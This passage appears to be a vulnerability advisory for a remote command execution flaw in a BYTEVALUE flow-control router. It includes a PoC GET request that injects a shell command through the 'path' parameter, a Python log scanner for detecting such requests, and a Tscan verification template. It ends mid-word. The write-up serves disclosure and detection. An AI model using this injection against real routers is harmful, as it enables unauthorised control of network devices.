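0x01 Vulnerability Description
The BYTEVALUE (百为) flow-control router provides powerful multi-line traffic splitting and multi-line aggregation load balancing; combined with its leading intelligent flow-control QoS technology, it addresses the problem of insufficient bandwidth in internet cafés, residential communities and other public business venues. The router has a remote command execution vulnerability.
0x02 Vulnerability Reproduction
(1) Payload URL path: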
/goform/webRead/open/?path=|echo+12345
(2) Command execution PoC:
GET /goform/webRead/open/?path=|echo+12345 HTTP/1.1
Host: 127.0.0.1
Accept: */*
Connection: Keep-Alive
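
Defenders can look for this request shape in web or reverse-proxy access logs. The Python sketch below is an added example, not part of the original write-up; the Common Log Format, the sample log lines and the list of shell metacharacters are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

ENDPOINT = "/goform/webRead/open"            # endpoint named in the write-up
SHELL_META = re.compile(r"[|;&`$<>\r\n]")    # assumed list of shell metacharacters
REQUEST_RE = re.compile(r'"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+"')

# Constructed sample access-log lines (Common Log Format, documentation IPs).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /goform/webRead/open/?path=|echo+12345 HTTP/1.1" 200 6',
    '192.0.2.11 - - [01/Jan/2024:10:00:05 +0000] "GET /goform/webRead/open/?path=%7Cecho+abcdefgh HTTP/1.1" 200 9',
    '198.51.100.7 - - [01/Jan/2024:10:01:00 +0000] "GET /goform/webRead/open/?path=readme.txt HTTP/1.1" 200 120',
    '198.51.100.7 - - [01/Jan/2024:10:02:00 +0000] "GET /index.html?path=|x HTTP/1.1" 200 10',
]

def suspicious_path_values(log_line):
    """Return decoded path= values on the webRead endpoint that contain shell metacharacters."""
    m = REQUEST_RE.search(log_line)
    if not m:
        return []
    parts = urlsplit(m.group("target"))
    if parts.path.rstrip("/") != ENDPOINT:
        return []
    # parse_qs percent-decodes and turns '+' into a space, so %7C is seen as '|'
    values = parse_qs(parts.query, keep_blank_values=True).get("path", [])
    return [v for v in values if SHELL_META.search(v)]

def scan(lines):
    """Return (line number, source address, offending values) for each flagged line."""
    hits = []
    for number, line in enumerate(lines, 1):
        values = suspicious_path_values(line)
        if values:
            hits.append((number, line.split(" ", 1)[0], values))
    return hits

if __name__ == "__main__":
    for number, source, values in scan(SAMPLE_LOG):
        print(f"line {number}: {source} sent path={values!r}")
```
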
0x03 Using the PoC (Tscan verification)
params: []
name: BYTEVALUE 百为流控路由器远程命令漏洞
set:
  a1: randomLowercase(8)
rules:
- method: GET
  path: /goform/webRead/open/?path=|echo+{{a1}}
  headers: {}
  body: ""
  search: ""
  followredirects: false
  expression: response.status == 200 && response.body.bcontains(bytes(string(a1)))
gro